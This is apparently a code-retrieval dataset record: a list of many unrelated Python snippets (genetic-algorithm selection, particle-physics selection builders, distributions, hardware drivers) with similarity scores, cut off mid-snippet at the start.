job \n if rand_operation.get_sequence() == self.jssp_instance_data.get_job(rand_job_id).get_max_sequence():\n del available[rand_job_id]\n else:\n available[rand_job_id] = [t for t in self.jssp_instance_data.get_job(rand_job_id).get_operations() if\n t.get_sequence() == rand_operation.get_sequence() + 1]\n\n\n operation_list.append([rand_job_id, rand_operation.get_operation_id(), rand_operation.get_sequence(), rand_machine]) # chromosome representation \n return Solution(self.jssp_instance_data, np.array(operation_list, dtype=np.intc))", "def __init__(self, dict = {}):\r\n if dict == {}:\r\n self.zero_val()\r\n else:\r\n self.piDD = dict\r\n self.top_node = utilities.max_length_in_list(self.return_keys())\r\n if self.piDD[self.top_node] == None:\r\n self.dim = 0\r\n else:\r\n self.dim = self.piDD[self.top_node][0][0]", "def __init__(self):\n\n self.P = list()\n self.label = 0", "def __init__(self, radius=0.5, extra={}):\n self.radius = radius\n self.sensors = [] # array of Attached\n self.id_sensors = None\n self.id_dynamics = None # XXX\n self.dynamics = None\n self.extra = extra\n\n self.primitives = set()\n\n # Needs to be initialized before calling certain functions\n self._state = None", "def _select(self):\n sel = []\n\n # choose randomly while favouring fit individuals\n lp = len(self.population) // 2\n for _ in range(lp):\n idx1 = idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n while idx1 == idx2:\n idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n\n p1, p2 = self.population[idx1], self.population[idx2]\n sel.append((p1, p2))\n\n return sel", "def eta23pi ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import DaVinci__N3BodyDecays\n ## \n pre_eta = self.make_selection (\n ## the unique tag \n 'PreEta3Pi' ,\n ## algorithm type to be used\n DaVinci__N3BodyDecays ,\n ## input selections \n [ self.pions () , self.pi0 () ] ,\n ## algorithm properties \n DecayDescriptor = \" eta -> pi+ pi- pi0\" ,\n ## \n Combination12Cut = \"\"\" ( AM < 700 
* MeV ) &\n ( ACHI2DOCA(1,2) < 12 ) \n \"\"\" , \n ##\n CombinationCut = \"\"\"\n ( APT > %s ) & ( ADAMASS ( 'eta' ) < 100 * MeV )\n \"\"\" % ( 0.9 * self['ETA_PT'] ) ,\n ##\n MotherCut = \"\"\"\n ( PT > %s ) &\n ( chi2vx < 9 ) \n \"\"\" % self['ETA_PT']\n )\n ##\n from GaudiConfUtils.ConfigurableGenerators import Pi0Veto__Tagger2g\n ## \n return self.make_selection (\n 'Eta23pi' ,\n Pi0Veto__Tagger2g ,\n [ pre_eta ] ,\n MassWindow = 25 * MeV ,\n MassChi2 = -1 ,\n ExtraInfoIndex = 25016 ## unique ! \n )", "def __init__(self):\n raise NotImplementedError('cannot create independent arc')", "def __init__(self, d):\n\t\tself._coords = [0] * d", "def test_non_it(self):\n self.idx = [9, 11, 6, 10, 12, 2, 8, 1, 5, 0, 7, 4, 3]\n selector = PCovCUR(n_to_select=12, iterative=False)\n selector.fit(self.X, self.y)\n\n self.assertTrue(np.allclose(selector.selected_idx_, self.idx[:-1]))", "def __init__(self):\n\n # Assign a nullptr for the device-side pointers. These will be set if the GPU is utilized.\n self.ng = int(0)\n self.goals = ct.POINTER(ct.c_uint)()\n self.currentHorizon = int(0)\n self.V = ct.POINTER(ct.c_float)()\n self.VPrime = ct.POINTER(ct.c_float)()\n self.pi = ct.POINTER(ct.c_uint)()\n self.ne = int(0)\n self.expanded = ct.POINTER(ct.c_int)()\n self.d_goals = ct.POINTER(ct.c_uint)()\n self.d_S = ct.POINTER(ct.c_int)()\n self.d_T = ct.POINTER(ct.c_float)()\n self.d_R = ct.POINTER(ct.c_float)()\n self.d_V = ct.POINTER(ct.c_float)()\n self.d_VPrime = ct.POINTER(ct.c_float)()\n self.d_pi = ct.POINTER(ct.c_uint)()\n self.d_expanded = ct.POINTER(ct.c_int)()\n\n # Additional informative variables.\n self.Rmin = None\n self.Rmax = None", "def selected_choice(self):\r\n choice = zeros(self.num_agents)\r\n random_numbers = self.generate_random_numbers()\r\n\r\n self.prob_cumsum = self.cumprob().filled(-1)\r\n\r\n for i in range(self.num_choices):\r\n # Indicator for the zero cells in the choice array\r\n #indicator_zero_cells = ones(self.num_agents)\r\n indicator = array([True]*self.num_agents)\r\n\r\n zero_indices = choice == 0\r\n #indicator_zero_cells[~zero_indices] = ma.masked\r\n indicator[~zero_indices] = False\r\n\r\n # Indicator for the cells where the random number\r\n # is less than the probability\r\n #indicator_less_cells = ones(self.num_agents)\r\n #indicator_less_cells = array([True]*self.num_agents)\r\n less_indices = random_numbers < self.prob_cumsum[:,i]\r\n #indicator_less_cells[~less_indices] = ma.masked\r\n #indicator_less_cells\r\n indicator[~less_indices] = False\r\n\r\n\r\n #indicator_less_zero_cells = indicator_zero_cells + indicator_less_cells\r\n\r\n #indicator_less_zero_cells = indicator_less_zero_cells == 2\r\n\r\n choice[indicator] = i + 1\r\n\r\n choice.shape = (self.num_agents, 1)\r\n\r\n #alt_text = []\r\n #for i in choice:\r\n # alt_text.append(self.choices[int(i[0])-1])\r\n #alt_text = array(alt_text)\r\n #alt_text.shape = (self.num_agents, 1)\r\n\r\n #return alt_text\r\n #print choice\r\n return DataArray(choice, ['selected choice'])", "def __init__(self, analogue_selection='indep', clock_selection='in', cal_mode='no_cal', clk_speed=800):\n self.value = 0\n self.value |= (0b1 << 2) # disable chip version output bit\n self.value |= (0b1 << 3) # set demux to 1:2\n clk_bits = 0b00 if (clk_speed<125) else 0b01 if (clk_speed<250) else 0b10 if (clk_speed<500) else 0b11\n self.value |= (clk_bits << 12) # control wait bit calibration value is dependent on clk speed\n self.value |= (1 << 14) # set FDataReady to Fs/2. 
I don't know what this means\n self.set_analogue_selection(analogue_selection)\n self.set_clock_selection(clock_selection)\n self.set_cal_mode(cal_mode)", "def pi(self):\n return self(self._real_field().pi())", "def __init__(self):\n super().__init__()\n self.lambdaVar = 1.0\n self.low = 0.0\n self.type = 'Exponential'\n self.distType = 'Continuous'\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, params):\r\n _params = {'Similarity': 0.97,\r\n 'Application': 'cdhit',\r\n 'Algorithm': 'cdhit: \"longest-sequence-first list removal algorithm\"'}\r\n _params.update(params)\r\n OtuPicker.__init__(self, _params)", "def __init__(self, goal=0, kP=1, kI=1, kD=1, init_pt=0):\n self._pid_lock = threading.Lock()\n\n self.set_goal(goal)\n self.reset(init_pt)\n self.set_gains({\n PIDController.KP_KEY: kP,\n PIDController.KI_KEY: kI,\n PIDController.KD_KEY: kD\n })", "def select(self):\n\n return self.p[0], self.p[1]", "def __init__(\n self, voltage={0:(0, 0)}, rate=500, repetitions=1,\n board_name='cDAQ1Mod1', voltage_limits=None, num_channels=7):\n self.board_name = board_name #Check Measurement and Automation Explorer\n self._taskHandle = ctypes.c_void_p(0)\n self.num_channels = num_channels\n DAQmxErrChk(api.DAQmxCreateTask(\"\", ctypes.byref(self._taskHandle)))\n DAQmxErrChk(api.DAQmxCreateAOVoltageChan(\n self._taskHandle,\n self.board_name + \"/ao0:%i\"%(num_channels - 1),\n \"\",\n ctypes.c_double(-10.0), #Minimum voltage\n ctypes.c_double(10.0), #Maximum voltage\n 10348, #DAQmx_Val_Volts; don't question it!\n ctypes.c_void_p(0), #NULL\n ))\n self.num_points_written = ctypes.c_long(0)\n self._unwritten_voltages = False\n self._unplayed_voltages = False\n self.set_voltage_and_timing(voltage, rate, repetitions, voltage_limits)\n return None", "def get_selection(self, selection_name, format=None):", "def null(cls, d=2):\n return cls(*[0 for i in range(d)])", "def circle(self):\n return circle(self.N, self.o, self.r)", "def p_selection(p_init, it, n_iters):\n it = int(it / n_iters * 10000)\n\n if 10 < it <= 50:\n p = p_init / 2\n elif 50 < it <= 200:\n p = p_init / 4\n elif 200 < it <= 500:\n p = p_init / 8\n elif 500 < it <= 1000:\n p = p_init / 16\n elif 1000 < it <= 2000:\n p = p_init / 32\n elif 2000 < it <= 4000:\n p = p_init / 64\n elif 4000 < it <= 6000:\n p = p_init / 128\n elif 6000 < it <= 8000:\n p = p_init / 256\n elif 8000 < it <= 10000:\n p = p_init / 512\n else:\n p = p_init\n\n return p", "def __init__(self, pin1=24, pin2=28, pin3=25, pin4=33):\n self.GP = GPIOProcessor()\n self.pin1 = self.GP.getPin(pin1)\n self.pin2 = self.GP.getPin(pin2)\n self.pin3 = self.GP.getPin(pin3)\n self.pin4 = self.GP.getPin(pin4)\n self.pinl = [self.pin1, self.pin2, self.pin3, self.pin4]\n\n for k in range(4):\n self.pinl[k].out()\n\n self.speed = 100.0", "def select_arm(self):\n\n # Exploitation\n if random.uniform(0, 1) > self.epsilon:\n return np.argmax(self.values)\n\n # Exploration\n else:\n return random.randrange(len(self.values))", "def pick(self):\n\n pickerdict = {}\n current_value = 0\n\n if len(self.choices) == 0:\n return None\n\n if len(self.choices) == 1:\n return self.choices[0][0]\n\n for option in self.choices:\n pickerdict[current_value] = option[0]\n current_value += option[1]\n\n picker = random.randint(0, current_value)\n last_value = 0\n result = None\n sorted_keys = sorted(pickerdict.keys())\n\n found = False\n for key in sorted_keys:\n if key >= picker:\n result = 
pickerdict[last_value]\n found = True\n continue\n last_value = key\n\n if not found:\n result = pickerdict[sorted_keys[-1]]\n\n return result", "def select(self):\n pass", "def select(self):\n pass", "def __init__(self, choice):\r\n self.choice = choice", "def make_car():\n car = Car() \n car.drop_val = random.randint(0,1)\n\n if car.drop_val == 0:\n car.drop_x = random.randint(77, 400) * 2\n\n elif car.drop_val == 1:\n car.drop_y = random.randint(62, 300) *2\n\n return car", "def __init__(self, D, K):\n\t\tself.D = D \n\t\tself.K = K \n\t\tself.V = np.zeros((D+1,K))\n\t\treturn", "def dropdown(self):\n # defaults = DDConfig(0.6, 0.6, 0, 0)\n return DropDown(self.name, self.command, **self.config)", "def touching_choice(self,p):\n\n part = ['head', 'foot1', 'foot2', 'foot3', 'foot4', 'back', 'stomach', 'tail']\n if len(self.select[p]) == 0:\n return random.sample(part,2)\n elif len(self.select[p]) == 1:\n part.remove(self.select[p][0])\n c = random.sample(part,1)\n return [self.select[p][0], c[0]]\n else:\n return random.sample(self.select[p],2)", "def __init__(self, inplace=False):\n super(SELU, self).__init__()\n self.inplace = inplace", "def __init__(self, motor, OD_range=None, motor_range=None,\n motor_min=None, OD_min=None, motor_max=None, OD_max=None):\n self.motor = motor\n if OD_range is not None:\n self.OD_range = OD_range\n if motor_range is not None:\n self.motor_range = motor_range\n\n if motor_min is not None:\n self.motor_min = motor_min\n else:\n self.motor_min = motor_range[0]\n\n if motor_max is not None:\n self.motor_max = motor_max\n else:\n self.motor_max = motor_range[1]\n\n if OD_min is not None:\n self.OD_min = OD_min\n else:\n self.OD_min = OD_range[0]\n\n if OD_max is not None:\n self.OD_max = OD_max\n else:\n self.OD_max = OD_range[1]", "def select(self):\r\n pass", "def __init__(self, r: float, i: float = 0):\n self.r = r\n self.i = i", "def __init__(self, tpose, mpose, tselect=[], mselect=[]):\n self.target = tpose\n self.mobile = mpose\n self.target_residues = res_selector_to_size_list(tselect)\n self.mobile_residues = res_selector_to_size_list(mselect)\n self.set_target_sequence()\n self.set_mobile_sequence()\n self.atoms = ['N','C','CA']\n self.bb_rmsd = None", "def create_soft_cluster():\n # node, index_component, inf_val = general.get_soft_selection()\n soft_element_data = general.get_soft_selection()\n selection = [vtx_component for vtx_component, inf_val in soft_element_data]\n\n pm.select(selection, r=True)\n cluster = pm.cluster(relative=True)\n\n for vtx_component, inf_val in soft_element_data:\n pm.percent(cluster[0], vtx_component, v=inf_val)\n pm.select(cluster[1], r=True)\n\n return cluster", "def __init__(self):\n {}\n #generate a monoid Q\n self.monoid_Q = self.generateQ()[0]\n self.relationOfElements_Q = self.generateQ()[1]\n self.p_Position = self.generateQ()[2]\n self.qOfPosition = self.generateQ()[3]\n #print(self.qOfPosition)", "def get_slider():\n return dcc.RangeSlider(\n id='hours',\n value=[0, 23],\n min=0,\n max=23,\n marks={i: str(i) for i in range(0, 24, 3)}\n )", "def choose_pos(self):\n s = self\n\n availablepos = []\n for dblock in s.pjs.dblocks:\n is_available = True\n\n for powerup in s.pjs.powerups:\n if powerup.rects[0].overlap(dblock.rects[0]):\n is_available = False\n break\n\n if is_available:\n availablepos.append(dblock.rpos)\n\n pos = random.randint(0, len(availablepos) - 1)\n s.rpos = availablepos[pos]", "def zero_val(self):\r\n self.piDD = {\"[0]\": None}\r\n self.top_node = \"[0]\"\r\n self.dim = 0", "def 
__init__(self):\n super().__init__()\n self.low = 0.0\n self.high = 1.0\n self.alpha = 0.0\n self.beta = 0.0\n self.type = 'Beta'\n self.distType = 'Continuous'\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('Jacobi')\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'Jacobi'\n self.preferredPolynomials = 'Jacobi'", "def selectPointsUnderCursor(self):\n spw = self.spw\n sw = spw.windows['Sort']\n #if clear:\n # sw.uslist.clearSelection()\n # sw.nlist.clearSelection()\n x, y = self.cursorPosGL()\n sids = self.pick(x, y, pb=10, multiple=True)\n if sids is None:\n return\n #t0 = time.time()\n spw.SelectSpikes(sids, on=self.selecting)\n #print('SelectSpikes took %.3f sec' % (time.time()-t0))\n if self.selecting == True:\n sat = 0.2 # desaturate\n else: # self.selecting == False\n sat = 1 # resaturate\n self.color(sids, sat=sat)\n self.updateGL()", "def selection(self) -> Chromosome:\n # each chromosome has a fitness, and the lower the fitness, the higher the probability of election\n choices_list = list(range(len(self._population)))\n weights = [1 / chromosome.get_fitness() for chromosome in self._population]\n\n index = choices(choices_list, weights=weights)[0]\n\n return self._population[index]", "def create_pressure_vessel_geometry():\r\n\r\n # configure sigmoid function\r\n bounds_upper = [3, 6]\r\n h = 5\r\n w = 6\r\n\r\n sigmoid_function = lambda x: (1 / (1 + np.exp(-1 * h * x + w))) + 1\r\n\r\n sigmoid_function_reverse = lambda x: 1 / (1 + np.exp(h * x - w - 18)) + 1\r\n\r\n funcs_upper = [sigmoid_function, sigmoid_function_reverse]\r\n\r\n bounds_lower = None\r\n funcs_lower = 0\r\n\r\n x_max = 6\r\n x_min = 0\r\n resolution = 10000\r\n\r\n pressure_vessel = Geometry(x_max, x_min, resolution,\r\n bounds_upper, funcs_upper,\r\n bounds_lower, funcs_lower)\r\n\r\n return pressure_vessel", "def random(cls, d=2, borns=[-1, 1], **kwargs):\n components = [random.uniform(*borns) for i in range(d)]\n return cls(*components, **kwargs)", "def random(cls, d=2, borns=[-1, 1], **kwargs):\n components = [random.uniform(*borns) for i in range(d)]\n return cls(*components, **kwargs)" ]
[ "0.60390633", "0.5895539", "0.55829453", "0.5348063", "0.5305103", "0.5261155", "0.5167734", "0.51543236", "0.5077886", "0.5058524", "0.50535107", "0.50340015", "0.5013713", "0.49337313", "0.49296355", "0.48771095", "0.48653218", "0.48559302", "0.48356175", "0.48229763", "0.47938704", "0.47937343", "0.47884813", "0.4786957", "0.47820017", "0.47796422", "0.4728191", "0.47270483", "0.4726566", "0.47224525", "0.47163728", "0.4692927", "0.4683308", "0.4682291", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.4626385", "0.46214193", "0.46164653", "0.46056542", "0.46046007", "0.46033987", "0.4589671", "0.4589013", "0.45679867", "0.4566554", "0.4557653", "0.45532042", "0.45365626", "0.4530548", "0.45283732", "0.45273715", "0.45257515", "0.4514184", "0.45141345", "0.45109862", "0.44972917", "0.44914532", "0.44913852", "0.44850183", "0.4477581", "0.44768035", "0.44728625", "0.44718337", "0.44647622", "0.44641063", "0.44597855", "0.44592988", "0.4457611", "0.44562554", "0.44530872", "0.44520926", "0.44520926", "0.44454646", "0.44417307", "0.44354388", "0.44337845", "0.4429657", "0.44287014", "0.44256827", "0.44169018", "0.44125795", "0.44094974", "0.440373", "0.43920735", "0.4389144", "0.4388632", "0.43877658", "0.43853682", "0.43819612", "0.43802664", "0.4378483", "0.4376915", "0.4376915" ]
0.6516377
0
Create and return a D -> K pi pi+ Selection object.
def makeDPartial( name , config , DecayDescriptor , inputSel ) : _Kcuts1 = "~ISMUON & (PT > %(DaugPtLoose)s* MeV) & (MIPCHI2DV(PRIMARY) > %(DaugIPChi2Loose)s)" % locals()['config'] _KcutsPIDK = " & (PIDK > %(HighPIDK)s)" % locals()['config'] _Kcuts2 = " & (ISLONG) & (P > %(DaugPLoose)s* MeV) & (TRCHI2DOF < %(DaugTrkChi2Loose)s)" % locals()['config'] _Kcuts = _Kcuts1 + _KcutsPIDK + _Kcuts2 _Picuts1 = "~ISMUON & (PT > %(DaugPtMin)s* MeV) & (MIPCHI2DV(PRIMARY) > %(DaugIPChi2)s)" % locals()['config'] _PicutsPIDK = " & (PIDK < %(LowPIDK)s)" % locals()['config'] _Picuts2 = " & (ISLONG) & (P > %(DaugP)s* MeV) & (TRCHI2DOF < %(DaugTrkChi2)s)" % locals()['config'] _Picuts = _Picuts1 + _PicutsPIDK + _Picuts2 _dauCuts = { 'K+': _Kcuts, 'pi+': _Picuts } #_Kcuts1 = "~ISMUON & (PT > 500* MeV) & (MIPCHI2DV(PRIMARY) > 4)" #_KcutsPIDK = " & (PIDK > 5)" #_Kcuts2 = " & (ISLONG) & (P > 5000* MeV) & (TRCHI2DOF < 5)" #_Kcuts = _Kcuts1 + _KcutsPIDK + _Kcuts2 #_Picuts1 = "~ISMUON & (PT > 500* MeV) & (MIPCHI2DV(PRIMARY) > 4)" #_PicutsPIDK = " & (PIDK < 0)" #_Picuts2 = " & (ISLONG) & (P > 5000* MeV) & (TRCHI2DOF < 5)" #_Picuts = _Picuts1 + _PicutsPIDK + _Picuts2 #_dauCuts = { 'K+': _Kcuts, 'pi+': _Picuts } _combCuts = "(APT > %(D0PtLoose)s* MeV)" \ "& (AP > %(D0P)s* MeV)" % locals()['config'] _motherCuts = "(VFASPF(VCHI2PDOF) < %(D0VtxChi2Ndof)s)" \ "& (BPVVDCHI2 > %(D0FDChi2)s)" % locals()['config'] _Dminus = CombineParticles( DecayDescriptor = DecayDescriptor , DaughtersCuts = _dauCuts , CombinationCut = _combCuts , MotherCut = _motherCuts ) return Selection( name+'Sel', Algorithm = _Dminus, RequiredSelections = inputSel )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_selection ( self ,\n tag , \n algotype ,\n inputs , \n *args ,\n **kwargs ) :\n sel_tag = '%s_Selection' % tag\n sel_name = 'Sel%sFor%s' % ( tag , self.name() )\n #\n ## check existing selection\n #\n sel = self._selection ( sel_tag )\n if sel : return sel \n\n #\n ## adjust a bit the arguments\n if not kwargs.has_key('Preambulo') :\n kwargs ['Preambulo' ] = self['Preambulo']\n\n if not kwargs.has_key( 'ParticleCombiners' ) :\n kwargs ['ParticleCombiners'] = { '' : 'LoKi::VertexFitter:PUBLIC' } \n \n # \n ## use \"simple-selection\"\n #\n from PhysSelPython.Wrappers import SimpleSelection\n sel = SimpleSelection (\n sel_name ,\n algotype ,\n inputs , \n *args ,\n **kwargs )\n # \n return self._add_selection( sel_tag , sel )", "def from_selection(cls):\n guid = compas_rhino.select_point()\n return cls.from_guid(guid)", "def makeDstar2D0Pi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def create(cls, selection):\n\t\t\n\t\treturn cls({ true_selector: selection, false_selector: Selection.invert(selection) })", "def get_selection():\n\n selected = Gui.Selection.getSelectionEx()[0].SubObjects\n sel_len = len(selected)\n result = SelectionContainer()\n\n for _x in range(0, sel_len):\n\n shape_type = selected[_x].ShapeType\n\n if shape_type == 'Vertex':\n result.vertices.append(selected[_x])\n\n elif shape_type == 'Edge':\n\n if 'Line' in str(selected[_x].Curve):\n result.lines.append(selected[_x])\n else:\n result.curves.append(selected[_x])", "def curve_through_selection(*args):\n sel = cmds.ls(sl=True, fl=True)\n if not sel or len(sel)==1:\n cmds.warning(\"You need to select multiple things to create curve through!\")\n return()\n\n pList = []\n crvType = cmds.radioButtonGrp(widgets[\"crvSelRBG\"], q=True, sl=True)\n\n for obj in sel:\n if cmds.objectType(obj) in [\"transform\"]:\n pos = cmds.xform(obj, q=True, ws=True, rp=True)\n pList.append(pos)\n elif obj in cmds.filterExpand(sm=[28, 30, 31, 32, 34, 46]):\n pos = cmds.pointPosition(obj)\n pList.append(pos)\n\n #add points if only 2 (cv, ep) or 3 (cv) are given, and create the curve\n if crvType == 1:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n if len(pList) == 3:\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), 
pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n crv = cmds.curve(d=3, p=pList, name=\"newCurve\")\n\n if crvType == 2:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n crv = cmds.curve(d=3, ep=pList, name=\"newCurve\")\n\n return(crv)", "def generate_kdtree(self):\n if self.method==2:\n coordinates = self.unassigned_data[0:3,:]\n else:\n coordinates = self.unassigned_data[0:2,:]\n tree = cKDTree(coordinates.T)\n\n return tree", "def createSelector(self,type='select',speed=2.0):\n self.selector = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector.hide()\n ival = self.selector.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def 选择项目(self, n): # real signature unknown; restored from __doc__\n return self.Select(n)", "def selection(self):\n # create an empty priority queue for the new generation\n newGeneration = PriorityQueue()\n # pick top X of the population to survive\n for c in range(0, self.generation.qsize() / SELECTION_FRACTION):\n # get a chromosome\n chromosome = self.generation.get()\n # put the chromosomes in the new generation\n newGeneration.put(chromosome)\n # keep the new generation\n self.generation = newGeneration", "def createSelector2(self,type='select',speed=2.0):\n self.selector2 = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector2.hide()\n ival = self.selector2.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def makeDefault(name,inputSel) :\n from Configurables import OfflineVertexFitter\n Detached4mu = CombineParticles(\"Combine\"+name)\n Detached4mu.DecayDescriptor = \"B_s0 -> mu+ mu- mu+ mu-\"\n # Set the OfflineVertexFitter to keep the 4 tracks and not the J/Psi Kstar:\n Detached4mu.addTool( OfflineVertexFitter )\n Detached4mu.ParticleCombiners.update( { \"\" : \"OfflineVertexFitter\"} )\n Detached4mu.OfflineVertexFitter.useResonanceVertex = False\n Detached4mu.ReFitPVs = True\n Detached4mu.DaughtersCuts = { \"mu+\" : \"(TRCHI2DOF < 2.5 ) \"\\\n \" & (MIPCHI2DV(PRIMARY)> 9.)\"}\n \n Detached4mu.CombinationCut = \"(ADAMASS('B_s0')<1000*MeV) \"\\\n \"& (AMAXDOCA('')<0.3*mm)\"\n Detached4mu.MotherCut = \"(VFASPF(VCHI2/VDOF)<9) \"\\\n \"& (BPVDIRA > 0) \"\\\n \"& (BPVVDCHI2>100)\"\\\n \" & (M>4366.3) & (M<6366.3)\"\\\n \"& (BPVIPCHI2()< 25) \"\n \n\n return Selection (name,\n Algorithm = Detached4mu,\n RequiredSelections = inputSel)", "def from_selection(\n class_,\n selection,\n item_class=None,\n ):\n import abjad\n pitch_segment = abjad.PitchSegment.from_selection(selection)\n return class_(\n pitch_segment,\n item_class=item_class,\n )", "def makePseudoPsi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n _daugCuts = \"(PT> %(D0PtLoose)s*MeV)\" % locals()['config']\n _combCuts = \"(APT> %(D0PtLoose)s*MeV)\" % locals()['config']\n\n _Psi = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"D0\": _daugCuts }\n , CombinationCut = _combCuts\n , MotherCut = \"(VFASPF(VCHI2PDOF) < 10000)\"\n )\n\n return Selection( name+'Sel',\n Algorithm = _Psi,\n RequiredSelections = inputSel\n )", "def selectPointsUnderCursor(self):\n spw = self.spw\n sw = spw.windows['Sort']\n #if clear:\n # sw.uslist.clearSelection()\n # sw.nlist.clearSelection()\n x, y = self.cursorPosGL()\n sids = self.pick(x, y, pb=10, multiple=True)\n if sids is None:\n return\n #t0 = time.time()\n spw.SelectSpikes(sids, on=self.selecting)\n #print('SelectSpikes took %.3f sec' % 
(time.time()-t0))\n if self.selecting == True:\n sat = 0.2 # desaturate\n else: # self.selecting == False\n sat = 1 # resaturate\n self.color(sids, sat=sat)\n self.updateGL()", "def get_gold_selection(self, pointer):\n raise NotImplementedError", "def _select(self):\n sel = []\n\n # choose randomly while favouring fit individuals\n lp = len(self.population) // 2\n for _ in range(lp):\n idx1 = idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n while idx1 == idx2:\n idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n\n p1, p2 = self.population[idx1], self.population[idx2]\n sel.append((p1, p2))\n\n return sel", "def select(self):\n\t\tbest_num_components = self.n_constant\n\t\treturn self.base_model(best_num_components)", "def eta23pi ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import DaVinci__N3BodyDecays\n ## \n pre_eta = self.make_selection (\n ## the unique tag \n 'PreEta3Pi' ,\n ## algorithm type to be used\n DaVinci__N3BodyDecays ,\n ## input selections \n [ self.pions () , self.pi0 () ] ,\n ## algorithm properties \n DecayDescriptor = \" eta -> pi+ pi- pi0\" ,\n ## \n Combination12Cut = \"\"\" ( AM < 700 * MeV ) &\n ( ACHI2DOCA(1,2) < 12 ) \n \"\"\" , \n ##\n CombinationCut = \"\"\"\n ( APT > %s ) & ( ADAMASS ( 'eta' ) < 100 * MeV )\n \"\"\" % ( 0.9 * self['ETA_PT'] ) ,\n ##\n MotherCut = \"\"\"\n ( PT > %s ) &\n ( chi2vx < 9 ) \n \"\"\" % self['ETA_PT']\n )\n ##\n from GaudiConfUtils.ConfigurableGenerators import Pi0Veto__Tagger2g\n ## \n return self.make_selection (\n 'Eta23pi' ,\n Pi0Veto__Tagger2g ,\n [ pre_eta ] ,\n MassWindow = 25 * MeV ,\n MassChi2 = -1 ,\n ExtraInfoIndex = 25016 ## unique ! \n )", "def get_selection(self, selection_name, format=None):", "def __init__(self, P, I, D, dt):\n\n\t\tself._Kp = P\n\t\tself._Ki = I\n\t\tself._Kd = D\n\t\tself._dt = dt", "def create_pauli_qiskit(pauli):\n\ttemp = [] # List in which save the weights and the Pauli strings\n\tfor key in pauli.keys(): # Iterate over all the Pauli strings\n\t\ttemp.append([pauli[key], Pauli(key)])\n\treturn WeightedPauliOperator(temp) # Transform the list into a qiskit operator", "def selectPointsUnderCursor(self):\n #spw = self.spw\n #sw = spw.windows['Sort']\n #if clear:\n # sw.uslist.clearSelection()\n # sw.nlist.clearSelection()\n x, y = self.cursorPosGL()\n sids = self.pick(x, y, pb=10, multiple=True)\n if sids == None:\n return\n #t0 = time.time()\n #if not sw.panel.maxed_out:\n # spw.SelectSpikes(sids, on=self.selecting)\n #else:\n # # for speed, while the mouse is held down and the sort panel is maxed out,\n # # don't call SelectSpikes, only call it once when the mouse is released\n self.collected_sids.append(sids)\n #print('SelectSpikes took %.3f sec' % (time.time()-t0))\n if self.selecting == True:\n sat = 0.2 # desaturate\n else: # self.selecting == False\n sat = 1 # resaturate\n self.color(sids, sat=sat)\n self.updateGL()", "def selection(self) -> Chromosome:\n # each chromosome has a fitness, and the lower the fitness, the higher the probability of election\n choices_list = list(range(len(self._population)))\n weights = [1 / chromosome.get_fitness() for chromosome in self._population]\n\n index = choices(choices_list, weights=weights)[0]\n\n return self._population[index]", "def _selectRandomPrototypes(K, n, q):\n G = [] # Vector of prototypes\n elements = range(n) # Index of the elements of E\n for k in range(K):\n Gk = random.sample(elements, q)\n G.append(Gk)\n return G", "def p_selection(p_init, it, n_iters):\n it = int(it / n_iters * 10000)\n\n if 10 < it <= 50:\n p = p_init / 
